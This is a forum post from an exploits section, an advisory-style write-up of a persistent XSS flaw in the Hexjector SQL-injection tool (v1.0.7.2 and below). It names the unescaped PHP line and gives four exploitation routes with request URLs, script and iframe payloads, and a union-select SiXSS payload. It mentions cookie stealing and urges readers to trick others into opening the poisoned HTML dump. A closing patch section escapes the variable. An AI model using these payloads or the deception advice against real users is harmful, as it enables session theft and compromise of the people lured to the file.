Jump to content
hexon

Hexjector Persistent XSS (<=v1.0.7.2)

By hexon, in Exploituri

Recommended Posts

hexon Newbie

hexon

Posted
Posted (edited)

# Exploit Title: Hexjector Persistent XSS (<=v1.0.7.2)

# Date: 25/5/2010

# Author: Hexon

# Software Link: https://sourceforge.net/projects/hexjector/files/Hexjector (Win32)/Hexjector v1.0.7.2.zip/download

# Version: v1.0.7.2 and below

# Tested on: Windows XP SP2, Windows 7,Ubuntu 9.10

# Code : http://localhost/Hexjector/hexjector.php?site=[XSS Code]&injsubmit=Submit+Query&custom_parameter=

-------------

Vulnerability

-------------

Locate This code in Line 91:

(It differs in each version , this is based on Hexjector v1.0.7.2)

$o_urlx = "URL : < ". $url2 ." >"."<br \>";

$url2 is not filtered so XSS codes can be executed.

You would need to find a site that is vulnerable either to XSS or SQL Injection

to generate this vulnerability.A site that is vulnerable to XSS only will also

work because my Hexjector will not stop running unlike Havij that will detect

that it is uninjectable and stop working.

------------

Exploitation

------------

You can insert javascript,html codes into the File Dump Created.

There are a few variations for to exploit this :

1.Use XSS codes directly in a XSS Vulnerable site

2.Use XSS codes directly.

3.Use SiXSS to generate a XSS code in a SQL Injection Vulnerable Site.

4.Include XSS code after the vulnerable parameter in a SQL Injection Vulnerable Site.

------------------------------------------------------------------------------------------

1.Use XSS codes directly in a XSS Vulnerable site

Example :

http://localhost/Hexjector/hexjector.php?site=[site with XSS Vulnerability]&injsubmit=Submit+Query&custom_parameter=

You can replace [site with XSS Vulnerability] with XSS codes like :

- <script>alert(1337)</script>

- <iframe src="http://localhost/hexjector/" height=0 width=0></iframe>

and many others. This is just a basic example.

------------------------------------------------------------------------------------------

2.Use XSS codes directly.

Example :

http://localhost/Hexjector/hexjector.php?site=[XSS Code]&injsubmit=Submit+Query&custom_parameter=

You can replace [XSS Code] with XSS codes like :

- <script>alert(1337)</script>

- <iframe src="http://localhost/hexjector/" height=0 width=0></iframe>

and many others. This is just a basic example.

------------------------------------------------------------------------------------------

3.Use SiXSS to generate a XSS code in a SQL Injection Vulnerable Site.

Example :

http://localhost/Hexjector/hexjector.php?site=[siXSS]&injsubmit=Submit+Query&custom_parameter=

Example of [siXSS]:

-2 union select 1,[XSS],3

(Assume that Column count = 3 and String column = 2)

For your acknowledge , String column is the column number where the data produces

output at the site.

You can replace [XSS] with XSS codes like :

- <script>alert(1337)</script>

- <iframe src="http://localhost/hexjector/" height=0 width=0></iframe>

and many others. This is just a basic example.

------------------------------------------------------------------------------------------

4.Include XSS code after the vulnerable parameter in a SQL Injection Vulnerable Site.

Example :

http://localhost/Hexjector/hexjector.php?site=[Vulnerable Parameter][XSS]&injsubmit=Submit+Query&custom_parameter=

[Value] is the SQL Injection Vulnerable Site with its parameter.

Example :

http://localhost/sqli.php?id=2

You can replace [XSS] with XSS codes like :

- <script>alert(1337)</script>

- <iframe src="http://localhost/hexjector/" height=0 width=0></iframe>

and many others. This is just a basic example.

------------------------------------------------------------------------------------------

NOTE :

Other XSS method can be used:

-Iframe

-Redirection

-Cookie Stealing and many others.

After you have tried either one (all of them are similar in a way or two but

this is just to show you all of the ways to do it) , a html dump will be

generated (File is saved as [HexDV(4/5)](32charlength).html) and open it.

Use your creativity to trick others to go to this file and you will

get the things that you want.

-----

Patch

-----

Replace the vulnerable line with this :

$o_urlx = "URL : < ". htmlspecialchars($url2,ENT_QUOTES) ." >"."<br \>";

The code($o_urlx) differs in each version so just find it manually and replace the

$url2 with the htmlspecialchars($url2,ENT_QUOTES).

Do not use replace or replace all functions as Hexjector uses a lot of $url2

and only one of it is vulnerable so find it manually. Replacing some or all of

it WILL definitely bring a slow down in terms of performance as

htmlspecialchars will take some time to execute.

This will patch the non-persistent XSS vulnerability as well.

----------

Queries ??

----------

Any questions regarding this Vulnerability,Please email to Hexjector@gmail.com or hkhexon@gmail.com.

Edited by hexon
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...